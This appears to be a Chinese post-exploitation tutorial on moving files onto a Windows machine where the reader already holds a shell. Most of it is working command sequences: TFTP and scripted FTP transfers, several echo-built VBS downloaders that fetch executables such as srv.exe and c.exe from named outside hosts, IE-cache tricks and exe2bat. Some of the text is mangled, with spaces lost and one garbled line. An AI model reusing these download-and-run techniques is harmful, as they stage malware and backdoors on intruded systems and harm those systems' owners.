本文是居于已经得到了一个有一定权限的SHELL.命令行下传送文件的其他方法.

一，TFTP

格式：tftp-igetfile.exepath/file.exe默认存放在system32下，如果指定就存在指定的地方。

二：ftp下载文件

ftp下载文件一般步骤如下：

echoopenxxx.xxx.xxx.xxx〉ftp.txt

echouser〉〉ftp.txt

echopassword〉〉ftp.txt

echobinary〉〉ftp.txt[可选]

echogetsrv.exe〉〉ftp.txt

echobye〉〉ftp.txt

ftp-s:ftp.txt(这一步是关键哟)

delftp.txt

这样srv.exe文件拖略谙吕戳恕１Ｖrv.exe已经存在指定位置。

四：写程序下载

脚本是非常好的东西，只要把源码保存到一个文件中就能运行。所以在shell下，用echo语句直接写到一个文件中，在用相应的解释程序执行就可以啦。这里是一个程序实例的简化:

echoSetxPost=CreateObject("Microsoft.XMLHTTP")〉webdown.vbs

echoxPost.Open"GET","http://txhak.126.com/srv.exe",0〉〉webdown.vbs

echoxPost.Send()〉〉webdown.vbs

echoSetsGet=CreateObject("ADODB.Stream")〉〉webdown.vbs

echosGet.Mode=3〉〉webdown.vbs

echosGet.Type=1〉〉webdown.vbs

echosGet.Open()〉〉webdown.vbs

echosGet.Write(xPost.responseBody)〉〉webdown.vbs

echosGet.SaveToFile"srv.exe",2〉〉webdown.vbs

然后执行cscriptwebdown.vbs就可以啦。其中，http://txhak.126.com/srv.exe改成你放文件的网站路径，srv.exe可以改成保存文件的路径。这里ADODB.Stream很重要如果目标机隔离了adodb.stream就会不成功。

五：STARTITS:HTTP://IP/文件名

然后cd"C:DocumentsandSettingsDefaultUserLocalSettingsTemporaryInternetFilesContent.IE5"

然后DIR文件名[1]

注意：那串长文件名要用""引起来，因为有空格

例子：C:DocumentsandSettingsAdministrator〉startits:http://xxx.xxx.xxx.xxx/srv.

C:DocumentsandSettingsAdministratorLocalSettingsTemporaryInternetFilesContent.IE5AB3MNO1的目录

2003-11-2217:4812,832srv[1].exe

1个文件12,832字节

列出所有文件:

1个文件12,832字节

0个目录6,425,985,024可用字节

C:DocumentsandSettingsAdministrator〉copyC:DocumentsandSettingsAdministratorLocalSettingsTemporaryInternetFilesContent.IE5AB3MNO1srv[1].exec:srv.exe

已复制1个文件

六。一句话下载。第4种方法的精简，有时很有用的

echoSetxPost=CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open^"GET^",^"http://soft.163vv.com/77169/c.exe^",0:xPost.Send():SetsGet=CreateObject(^"ADODB.Stream^"):sGet.Mode=3:sGet.Type=1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile^"c:c.exe^",2〉pig.vbs

七。写程序下载

echoiLocal=LCase(WScript.Arguments(1))〉c:down.vbs

echoiRemote=LCase(WScript.Arguments(0))〉〉c:down.vbs

echoSetxPost=CreateObject("Microsoft.XMLHTTP")〉〉c:down.vbs

echoxPost.Open"GET",iRemote,0〉〉c:down.vbs

echoxPost.Send()〉〉c:down.vbs

echoSetsGet=CreateObject("ADODB.Stream")〉〉c:down.vbs

echosGet.Mode=3〉〉c:down.vbs

echosGet.Type=1〉〉c:down.vbs

echosGet.Open()〉〉c:down.vbs

echosGet.Write(xPost.responseBody)〉〉c:down.vbs

echosGet.SaveToFileiLocal,2〉〉c:down.vbs

八.exe2bat命令行下输入，debug还原成文件

用exe2bat这个工具把exe文件转化成bat，然后一行行敲进去，这样工作量非常大，只适合于非常短小的文件。

【文件上传八大法－远程控制必看】相关文章：

★ linux的病毒发展史及分类

★ PJBlog存在SQL注入漏洞大家要快下补丁了

★ 由mysql弱口令取得system权限的实战

★ 新法远程控制 木马病毒瞄准Word

★ phpBB 2.0.13惊现漏洞的解决

★ 从搜索参数过滤不严到IDC虚拟主机的渗透

★ OBlog任意文件下载漏洞

★ UBB的跨站脚本攻击的漏洞

★ DVBBS7.1后台备份得到一个webshell

★ Byshell后门:无进程无DLL无硬盘文件